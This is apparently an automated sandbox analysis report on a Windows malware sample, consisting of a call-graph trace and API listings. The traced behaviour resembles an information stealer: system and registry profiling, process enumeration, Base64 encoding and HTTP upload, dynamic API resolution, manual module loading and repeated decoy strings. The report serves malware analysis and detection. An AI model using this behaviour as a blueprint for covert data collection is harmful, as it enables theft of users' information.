14904 941ec5 14903->14904 14905 94a9b0 4 API calls 14904->14905 14906 941ee5 14905->14906 14907 94a8a0 lstrcpy 14906->14907 14908 941eee 14907->14908 15546 947b00 GetUserDefaultLocaleName 14908->15546 14911 94a9b0 4 API calls 14912 941f0e 14911->14912 14913 94a8a0 lstrcpy 14912->14913 14914 941f17 14913->14914 14915 94a9b0 4 API calls 14914->14915 14916 941f36 14915->14916 14917 94a8a0 lstrcpy 14916->14917 14918 941f3f 14917->14918 14919 94a9b0 4 API calls 14918->14919 14920 941f60 14919->14920 14921 94a8a0 lstrcpy 14920->14921 14922 941f69 14921->14922 15550 947b90 14922->15550 14924 941f80 14925 94a920 3 API calls 14924->14925 14926 941f93 14925->14926 14927 94a8a0 lstrcpy 14926->14927 14928 941f9c 14927->14928 14929 94a9b0 4 API calls 14928->14929 14930 941fc6 14929->14930 14931 94a8a0 lstrcpy 14930->14931 14932 941fcf 14931->14932 14933 94a9b0 4 API calls 14932->14933 14934 941fef 14933->14934 14935 94a8a0 lstrcpy 14934->14935 14936 941ff8 14935->14936 15562 947d80 GetSystemPowerStatus 14936->15562 14939 94a9b0 4 API calls 14940 942018 14939->14940 14941 94a8a0 lstrcpy 14940->14941 14942 942021 14941->14942 14943 94a9b0 4 API calls 14942->14943 14944 942040 14943->14944 14945 94a8a0 lstrcpy 14944->14945 14946 942049 14945->14946 14947 94a9b0 4 API calls 14946->14947 14948 94206a 14947->14948 14949 94a8a0 lstrcpy 14948->14949 14950 942073 14949->14950 14951 94207e GetCurrentProcessId 14950->14951 15564 949470 OpenProcess 14951->15564 14954 94a920 3 API calls 14955 9420a4 14954->14955 14956 94a8a0 lstrcpy 14955->14956 14957 9420ad 14956->14957 14958 94a9b0 4 API calls 14957->14958 14959 9420d7 14958->14959 14960 94a8a0 lstrcpy 14959->14960 14961 9420e0 14960->14961 14962 94a9b0 4 API calls 14961->14962 14963 942100 14962->14963 14964 94a8a0 lstrcpy 14963->14964 14965 942109 14964->14965 15569 947e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14965->15569 14968 94a9b0 4 API calls 14969 942129 14968->14969 14970 94a8a0 lstrcpy 14969->14970 14971 942132 14970->14971 14972 94a9b0 4 API calls 14971->14972 14973 942151 14972->14973 14974 94a8a0 lstrcpy 14973->14974 14975 94215a 14974->14975 14976 94a9b0 4 API calls 14975->14976 14977 94217b 14976->14977 14978 94a8a0 lstrcpy 14977->14978 14979 942184 14978->14979 15573 947f60 14979->15573 14982 94a9b0 4 API calls 14983 9421a4 14982->14983 14984 94a8a0 lstrcpy 14983->14984 14985 9421ad 14984->14985 14986 94a9b0 4 API calls 14985->14986 14987 9421cc 14986->14987 14988 94a8a0 lstrcpy 14987->14988 14989 9421d5 14988->14989 14990 94a9b0 4 API calls 14989->14990 14991 9421f6 14990->14991 14992 94a8a0 lstrcpy 14991->14992 14993 9421ff 14992->14993 15586 947ed0 GetSystemInfo wsprintfA 14993->15586 14996 94a9b0 4 API calls 14997 94221f 14996->14997 14998 94a8a0 lstrcpy 14997->14998 14999 942228 14998->14999 15000 94a9b0 4 API calls 14999->15000 15001 942247 15000->15001 15002 94a8a0 lstrcpy 15001->15002 15003 942250 15002->15003 15004 94a9b0 4 API calls 15003->15004 15005 942270 15004->15005 15006 94a8a0 lstrcpy 15005->15006 15007 942279 15006->15007 15588 948100 GetProcessHeap RtlAllocateHeap 15007->15588 15010 94a9b0 4 API calls 15011 942299 15010->15011 15012 94a8a0 lstrcpy 15011->15012 15013 9422a2 15012->15013 15014 94a9b0 4 API calls 15013->15014 15015 9422c1 15014->15015 15016 94a8a0 lstrcpy 15015->15016 15017 9422ca 15016->15017 15018 94a9b0 4 API calls 15017->15018 15019 9422eb 15018->15019 15020 94a8a0 lstrcpy 15019->15020 15021 9422f4 15020->15021 15594 9487c0 15021->15594 15024 94a920 3 API calls 15025 94231e 15024->15025 15026 94a8a0 lstrcpy 15025->15026 15027 942327 15026->15027 15028 94a9b0 4 API calls 15027->15028 15029 942351 15028->15029 15030 94a8a0 lstrcpy 15029->15030 15031 94235a 15030->15031 15032 94a9b0 4 API calls 15031->15032 15033 94237a 15032->15033 15034 94a8a0 lstrcpy 15033->15034 15035 942383 15034->15035 15036 94a9b0 4 API calls 15035->15036 15037 9423a2 15036->15037 15038 94a8a0 lstrcpy 15037->15038 15039 9423ab 15038->15039 15599 9481f0 15039->15599 15041 9423c2 15042 94a920 3 API calls 15041->15042 15043 9423d5 15042->15043 15044 94a8a0 lstrcpy 15043->15044 15045 9423de 15044->15045 15046 94a9b0 4 API calls 15045->15046 15047 94240a 15046->15047 15048 94a8a0 lstrcpy 15047->15048 15049 942413 15048->15049 15050 94a9b0 4 API calls 15049->15050 15051 942432 15050->15051 15052 94a8a0 lstrcpy 15051->15052 15053 94243b 15052->15053 15054 94a9b0 4 API calls 15053->15054 15055 94245c 15054->15055 15056 94a8a0 lstrcpy 15055->15056 15057 942465 15056->15057 15058 94a9b0 4 API calls 15057->15058 15059 942484 15058->15059 15060 94a8a0 lstrcpy 15059->15060 15061 94248d 15060->15061 15062 94a9b0 4 API calls 15061->15062 15063 9424ae 15062->15063 15064 94a8a0 lstrcpy 15063->15064 15065 9424b7 15064->15065 15607 948320 15065->15607 15067 9424d3 15068 94a920 3 API calls 15067->15068 15069 9424e6 15068->15069 15070 94a8a0 lstrcpy 15069->15070 15071 9424ef 15070->15071 15072 94a9b0 4 API calls 15071->15072 15073 942519 15072->15073 15074 94a8a0 lstrcpy 15073->15074 15075 942522 15074->15075 15076 94a9b0 4 API calls 15075->15076 15077 942543 15076->15077 15078 94a8a0 lstrcpy 15077->15078 15079 94254c 15078->15079 15080 948320 17 API calls 15079->15080 15081 942568 15080->15081 15082 94a920 3 API calls 15081->15082 15083 94257b 15082->15083 15084 94a8a0 lstrcpy 15083->15084 15085 942584 15084->15085 15086 94a9b0 4 API calls 15085->15086 15087 9425ae 15086->15087 15088 94a8a0 lstrcpy 15087->15088 15089 9425b7 15088->15089 15090 94a9b0 4 API calls 15089->15090 15091 9425d6 15090->15091 15092 94a8a0 lstrcpy 15091->15092 15093 9425df 15092->15093 15094 94a9b0 4 API calls 15093->15094 15095 942600 15094->15095 15096 94a8a0 lstrcpy 15095->15096 15097 942609 15096->15097 15643 948680 15097->15643 15099 942620 15100 94a920 3 API calls 15099->15100 15101 942633 15100->15101 15102 94a8a0 lstrcpy 15101->15102 15103 94263c 15102->15103 15104 94265a lstrlen 15103->15104 15105 94266a 15104->15105 15106 94a740 lstrcpy 15105->15106 15107 94267c 15106->15107 15108 931590 lstrcpy 15107->15108 15109 94268d 15108->15109 15653 945190 15109->15653 15111 942699 15111->13542 15841 94aad0 15112->15841 15114 935009 InternetOpenUrlA 15118 935021 15114->15118 15115 9350a0 InternetCloseHandle InternetCloseHandle 15117 9350ec 15115->15117 15116 93502a InternetReadFile 15116->15118 15117->13546 15118->15115 15118->15116 15842 9398d0 15119->15842 15121 940759 15122 94077d 15121->15122 15123 940a38 15121->15123 15126 940799 StrCmpCA 15122->15126 15124 931590 lstrcpy 15123->15124 15125 940a49 15124->15125 16018 940250 15125->16018 15128 9407a8 15126->15128 15154 940843 15126->15154 15130 94a7a0 lstrcpy 15128->15130 15132 9407c3 15130->15132 15131 940865 StrCmpCA 15134 940874 15131->15134 15171 94096b 15131->15171 15133 931590 lstrcpy 15132->15133 15135 94080c 15133->15135 15136 94a740 lstrcpy 15134->15136 15137 94a7a0 lstrcpy 15135->15137 15139 940881 15136->15139 15140 940823 15137->15140 15138 94099c StrCmpCA 15141 9409ab 15138->15141 15160 940a2d 15138->15160 15142 94a9b0 4 API calls 15139->15142 15143 94a7a0 lstrcpy 15140->15143 15144 931590 lstrcpy 15141->15144 15145 9408ac 15142->15145 15147 94083e 15143->15147 15148 9409f4 15144->15148 15146 94a920 3 API calls 15145->15146 15149 9408b3 15146->15149 15845 93fb00 15147->15845 15151 94a7a0 lstrcpy 15148->15151 15153 94a9b0 4 API calls 15149->15153 15152 940a0d 15151->15152 15155 94a7a0 lstrcpy 15152->15155 15156 9408ba 15153->15156 15154->15131 15157 940a28 15155->15157 15158 94a8a0 lstrcpy 15156->15158 15160->13550 15171->15138 15493 94a7a0 lstrcpy 15492->15493 15494 931683 15493->15494 15495 94a7a0 lstrcpy 15494->15495 15496 931695 15495->15496 15497 94a7a0 lstrcpy 15496->15497 15498 9316a7 15497->15498 15499 94a7a0 lstrcpy 15498->15499 15500 9315a3 15499->15500 15500->14373 15502 9347c6 15501->15502 15503 934838 lstrlen 15502->15503 15527 94aad0 15503->15527 15505 934848 InternetCrackUrlA 15506 934867 15505->15506 15506->14450 15508 934eee 15507->15508 15509 939af9 LocalAlloc 15507->15509 15508->14472 15508->14474 15509->15508 15510 939b14 CryptStringToBinaryA 15509->15510 15510->15508 15511 939b39 LocalFree 15510->15511 15511->15508 15513 94a740 lstrcpy 15512->15513 15514 948b74 15513->15514 15515 94a740 lstrcpy 15514->15515 15516 948b82 GetSystemTime 15515->15516 15518 948b99 15516->15518 15517 94a7a0 lstrcpy 15519 948bfc 15517->15519 15518->15517 15519->14466 15521 94a931 15520->15521 15522 94a988 15521->15522 15525 94a968 lstrcpy lstrcat 15521->15525 15523 94a7a0 lstrcpy 15522->15523 15524 94a994 15523->15524 15524->14469 15525->15522 15526->14584 15527->15505 15528->14594 15529->14735 15530->14737 15531->14745 15660 9477a0 15532->15660 15535 9476c6 RegOpenKeyExA 15537 947704 RegCloseKey 15535->15537 15538 9476e7 RegQueryValueExA 15535->15538 15536 941c1e 15536->14827 15537->15536 15538->15537 15540 941c99 15539->15540 15540->14841 15542 941e09 15541->15542 15542->14883 15544 941e84 15543->15544 15545 947a9a wsprintfA 15543->15545 15544->14897 15545->15544 15547 941efe 15546->15547 15548 947b4d 15546->15548 15547->14911 15667 948d20 LocalAlloc CharToOemW 15548->15667 15551 94a740 lstrcpy 15550->15551 15552 947bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15551->15552 15561 947c25 15552->15561 15553 947c46 GetLocaleInfoA 15553->15561 15554 947d18 15555 947d1e LocalFree 15554->15555 15556 947d28 15554->15556 15555->15556 15557 94a7a0 lstrcpy 15556->15557 15560 947d37 15557->15560 15558 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15558->15561 15559 94a8a0 lstrcpy 15559->15561 15560->14924 15561->15553 15561->15554 15561->15558 15561->15559 15563 942008 15562->15563 15563->14939 15565 9494b5 15564->15565 15566 949493 GetModuleFileNameExA CloseHandle 15564->15566 15567 94a740 lstrcpy 15565->15567 15566->15565 15568 942091 15567->15568 15568->14954 15570 947e68 RegQueryValueExA 15569->15570 15572 942119 15569->15572 15571 947e8e RegCloseKey 15570->15571 15571->15572 15572->14968 15574 947fb9 GetLogicalProcessorInformationEx 15573->15574 15575 947fd8 GetLastError 15574->15575 15577 948029 15574->15577 15576 948022 15575->15576 15585 947fe3 15575->15585 15578 942194 15576->15578 15581 9489f0 2 API calls 15576->15581 15582 9489f0 2 API calls 15577->15582 15578->14982 15581->15578 15583 94807b 15582->15583 15583->15576 15584 948084 wsprintfA 15583->15584 15584->15578 15585->15574 15585->15578 15668 9489f0 15585->15668 15671 948a10 GetProcessHeap RtlAllocateHeap 15585->15671 15587 94220f 15586->15587 15587->14996 15589 9489b0 15588->15589 15590 94814d GlobalMemoryStatusEx 15589->15590 15593 948163 15590->15593 15591 94819b wsprintfA 15592 942289 15591->15592 15592->15010 15593->15591 15595 9487fb GetProcessHeap RtlAllocateHeap wsprintfA 15594->15595 15597 94a740 lstrcpy 15595->15597 15598 94230b 15597->15598 15598->15024 15600 94a740 lstrcpy 15599->15600 15606 948229 15600->15606 15601 948263 15602 94a7a0 lstrcpy 15601->15602 15604 9482dc 15602->15604 15603 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15603->15606 15604->15041 15605 94a8a0 lstrcpy 15605->15606 15606->15601 15606->15603 15606->15605 15608 94a740 lstrcpy 15607->15608 15609 94835c RegOpenKeyExA 15608->15609 15610 9483d0 15609->15610 15611 9483ae 15609->15611 15613 948613 RegCloseKey 15610->15613 15614 9483f8 RegEnumKeyExA 15610->15614 15612 94a7a0 lstrcpy 15611->15612 15623 9483bd 15612->15623 15617 94a7a0 lstrcpy 15613->15617 15615 94860e 15614->15615 15616 94843f wsprintfA RegOpenKeyExA 15614->15616 15615->15613 15618 948485 RegCloseKey RegCloseKey 15616->15618 15619 9484c1 RegQueryValueExA 15616->15619 15617->15623 15620 94a7a0 lstrcpy 15618->15620 15621 948601 RegCloseKey 15619->15621 15622 9484fa lstrlen 15619->15622 15620->15623 15621->15615 15622->15621 15624 948510 15622->15624 15623->15067 15625 94a9b0 4 API calls 15624->15625 15626 948527 15625->15626 15627 94a8a0 lstrcpy 15626->15627 15628 948533 15627->15628 15629 94a9b0 4 API calls 15628->15629 15630 948557 15629->15630 15631 94a8a0 lstrcpy 15630->15631 15632 948563 15631->15632 15633 94856e RegQueryValueExA 15632->15633 15633->15621 15634 9485a3 15633->15634 15635 94a9b0 4 API calls 15634->15635 15636 9485ba 15635->15636 15637 94a8a0 lstrcpy 15636->15637 15638 9485c6 15637->15638 15639 94a9b0 4 API calls 15638->15639 15640 9485ea 15639->15640 15641 94a8a0 lstrcpy 15640->15641 15642 9485f6 15641->15642 15642->15621 15644 94a740 lstrcpy 15643->15644 15645 9486bc CreateToolhelp32Snapshot Process32First 15644->15645 15646 94875d CloseHandle 15645->15646 15647 9486e8 Process32Next 15645->15647 15648 94a7a0 lstrcpy 15646->15648 15647->15646 15652 9486fd 15647->15652 15649 948776 15648->15649 15649->15099 15650 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15650->15652 15651 94a8a0 lstrcpy 15651->15652 15652->15647 15652->15650 15652->15651 15654 94a7a0 lstrcpy 15653->15654 15655 9451b5 15654->15655 15656 931590 lstrcpy 15655->15656 15657 9451c6 15656->15657 15672 935100 15657->15672 15659 9451cf 15659->15111 15663 947720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15660->15663 15662 9476b9 15662->15535 15662->15536 15664 947765 RegQueryValueExA 15663->15664 15665 947780 RegCloseKey 15663->15665 15664->15665 15666 947793 15665->15666 15666->15662 15667->15547 15669 948a0c 15668->15669 15670 9489f9 GetProcessHeap HeapFree 15668->15670 15669->15585 15670->15669 15671->15585 15673 94a7a0 lstrcpy 15672->15673 15674 935119 15673->15674 15675 9347b0 2 API calls 15674->15675 15676 935125 15675->15676 15832 948ea0 15676->15832 15678 935184 15679 935192 lstrlen 15678->15679 15680 9351a5 15679->15680 15681 948ea0 4 API calls 15680->15681 15682 9351b6 15681->15682 15683 94a740 lstrcpy 15682->15683 15684 9351c9 15683->15684 15685 94a740 lstrcpy 15684->15685 15686 9351d6 15685->15686 15687 94a740 lstrcpy 15686->15687 15688 9351e3 15687->15688 15689 94a740 lstrcpy 15688->15689 15690 9351f0 15689->15690 15691 94a740 lstrcpy 15690->15691 15692 9351fd InternetOpenA StrCmpCA 15691->15692 15693 93522f 15692->15693 15694 9358c4 InternetCloseHandle 15693->15694 15695 948b60 3 API calls 15693->15695 15701 9358d9 ctype 15694->15701 15696 93524e 15695->15696 15697 94a920 3 API calls 15696->15697 15698 935261 15697->15698 15699 94a8a0 lstrcpy 15698->15699 15700 93526a 15699->15700 15702 94a9b0 4 API calls 15700->15702 15705 94a7a0 lstrcpy 15701->15705 15703 9352ab 15702->15703 15704 94a920 3 API calls 15703->15704 15706 9352b2 15704->15706 15713 935913 15705->15713 15707 94a9b0 4 API calls 15706->15707 15708 9352b9 15707->15708 15709 94a8a0 lstrcpy 15708->15709 15710 9352c2 15709->15710 15711 94a9b0 4 API calls 15710->15711 15712 935303 15711->15712 15714 94a920 3 API calls 15712->15714 15713->15659 15715 93530a 15714->15715 15716 94a8a0 lstrcpy 15715->15716 15717 935313 15716->15717 15718 935329 InternetConnectA 15717->15718 15718->15694 15719 935359 HttpOpenRequestA 15718->15719 15721 9358b7 InternetCloseHandle 15719->15721 15722 9353b7 15719->15722 15721->15694 15723 94a9b0 4 API calls 15722->15723 15724 9353cb 15723->15724 15725 94a8a0 lstrcpy 15724->15725 15726 9353d4 15725->15726 15727 94a920 3 API calls 15726->15727 15728 9353f2 15727->15728 15729 94a8a0 lstrcpy 15728->15729 15730 9353fb 15729->15730 15731 94a9b0 4 API calls 15730->15731 15732 93541a 15731->15732 15733 94a8a0 lstrcpy 15732->15733 15734 935423 15733->15734 15735 94a9b0 4 API calls 15734->15735 15736 935444 15735->15736 15737 94a8a0 lstrcpy 15736->15737 15738 93544d 15737->15738 15739 94a9b0 4 API calls 15738->15739 15740 93546e 15739->15740 15833 948ead CryptBinaryToStringA 15832->15833 15835 948ea9 15832->15835 15834 948ece GetProcessHeap RtlAllocateHeap 15833->15834 15833->15835 15834->15835 15836 948ef4 ctype 15834->15836 15835->15678 15837 948f05 CryptBinaryToStringA 15836->15837 15837->15835 15841->15114 16084 939880 15842->16084 15844 9398e1 15844->15121 15846 94a740 lstrcpy 15845->15846 16019 94a740 lstrcpy 16018->16019 16020 940266 16019->16020 16021 948de0 2 API calls 16020->16021 16022 94027b 16021->16022 16023 94a920 3 API calls 16022->16023 16024 94028b 16023->16024 16025 94a8a0 lstrcpy 16024->16025 16026 940294 16025->16026 16027 94a9b0 4 API calls 16026->16027 16085 93988d 16084->16085 16088 936fb0 16085->16088 16087 9398ad ctype 16087->15844 16091 936d40 16088->16091 16092 936d63 16091->16092 16106 936d59 16091->16106 16107 936530 16092->16107 16096 936dbe 16096->16106 16117 9369b0 16096->16117 16098 936e2a 16099 936ee6 VirtualFree 16098->16099 16101 936ef7 16098->16101 16098->16106 16099->16101 16100 936f41 16104 9489f0 2 API calls 16100->16104 16100->16106 16101->16100 16102 936f26 FreeLibrary 16101->16102 16103 936f38 16101->16103 16102->16101 16105 9489f0 2 API calls 16103->16105 16104->16106 16105->16100 16106->16087 16108 936542 16107->16108 16110 936549 16108->16110 16127 948a10 GetProcessHeap RtlAllocateHeap 16108->16127 16110->16106 16111 936660 16110->16111 16113 93668f VirtualAlloc 16111->16113 16114 936730 16113->16114 16116 93673c 16113->16116 16115 936743 VirtualAlloc 16114->16115 16114->16116 16115->16116 16116->16096 16118 9369c9 16117->16118 16121 9369d5 16117->16121 16119 936a09 LoadLibraryA 16118->16119 16118->16121 16120 936a32 16119->16120 16119->16121 16124 936ae0 16120->16124 16128 948a10 GetProcessHeap RtlAllocateHeap 16120->16128 16121->16098 16123 936ba8 GetProcAddress 16123->16121 16123->16124 16124->16121 16124->16123 16125 9489f0 2 API calls 16125->16124 16126 936a8b 16126->16121 16126->16125 16127->16110 16128->16126

                              Executed Functions

                              Function 00949860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 949860-949874 call 949750 663 949a93-949af2 LoadLibraryA * 5 660->663 664 94987a-949a8e call 949780 GetProcAddress * 21 660->664 666 949af4-949b08 GetProcAddress 663->666 667 949b0d-949b14 663->667 664->663 666->667 669 949b46-949b4d 667->669 670 949b16-949b41 GetProcAddress * 2 667->670 671 949b4f-949b63 GetProcAddress 669->671 672 949b68-949b6f 669->672 670->669 671->672 673 949b71-949b84 GetProcAddress 672->673 674 949b89-949b90 672->674 673->674 675 949bc1-949bc2 674->675 676 949b92-949bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(75900000,010F0828), ref: 009498A1
                              • GetProcAddress.KERNEL32(75900000,010F0738), ref: 009498BA
                              • GetProcAddress.KERNEL32(75900000,010F0750), ref: 009498D2
                              • GetProcAddress.KERNEL32(75900000,010F05D0), ref: 009498EA
                              • GetProcAddress.KERNEL32(75900000,010F0600), ref: 00949903
                              • GetProcAddress.KERNEL32(75900000,010F87F8), ref: 0094991B
                              • GetProcAddress.KERNEL32(75900000,010E5488), ref: 00949933
                              • GetProcAddress.KERNEL32(75900000,010E55A8), ref: 0094994C
                              • GetProcAddress.KERNEL32(75900000,010F0768), ref: 00949964
                              • GetProcAddress.KERNEL32(75900000,010F0558), ref: 0094997C
                              • GetProcAddress.KERNEL32(75900000,010F0780), ref: 00949995
                              • GetProcAddress.KERNEL32(75900000,010F0618), ref: 009499AD
                              • GetProcAddress.KERNEL32(75900000,010E56C8), ref: 009499C5
                              • GetProcAddress.KERNEL32(75900000,010F0798), ref: 009499DE
                              • GetProcAddress.KERNEL32(75900000,010F0570), ref: 009499F6
                              • GetProcAddress.KERNEL32(75900000,010E5528), ref: 00949A0E
                              • GetProcAddress.KERNEL32(75900000,010F0588), ref: 00949A27
                              • GetProcAddress.KERNEL32(75900000,010F08D0), ref: 00949A3F
                              • GetProcAddress.KERNEL32(75900000,010E5668), ref: 00949A57
                              • GetProcAddress.KERNEL32(75900000,010F0888), ref: 00949A70
                              • GetProcAddress.KERNEL32(75900000,010E5688), ref: 00949A88
                              • LoadLibraryA.KERNEL32(010F0870,?,00946A00), ref: 00949A9A
                              • LoadLibraryA.KERNEL32(010F0840,?,00946A00), ref: 00949AAB
                              • LoadLibraryA.KERNEL32(010F08E8,?,00946A00), ref: 00949ABD
                              • LoadLibraryA.KERNEL32(010F0900,?,00946A00), ref: 00949ACF
                              • LoadLibraryA.KERNEL32(010F08A0,?,00946A00), ref: 00949AE0
                              • GetProcAddress.KERNEL32(75070000,010F0858), ref: 00949B02
                              • GetProcAddress.KERNEL32(75FD0000,010F08B8), ref: 00949B23
                              • GetProcAddress.KERNEL32(75FD0000,010F8DC0), ref: 00949B3B
                              • GetProcAddress.KERNEL32(75A50000,010F8C58), ref: 00949B5D
                              • GetProcAddress.KERNEL32(74E50000,010E5728), ref: 00949B7E
                              • GetProcAddress.KERNEL32(76E80000,010F88E8), ref: 00949B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00949BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00949BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                              • Instruction ID: 4e3a645a52866a17abbc2a059fb9e18d62f8982cd02c3ee98246574011ed054a
                              • Opcode Fuzzy Hash: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                              • Instruction Fuzzy Hash: 01A10AB55042409FD3C8EFA8ED99A5E3BF9F7C8301714451AA61D832A4DE39A8C1DB53
                              Function 009345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 9345c0-934695 RtlAllocateHeap 781 9346a0-9346a6 764->781 782 93474f-9347a9 VirtualProtect 781->782 783 9346ac-93474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0093460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0093479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00934643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0093475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009345F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
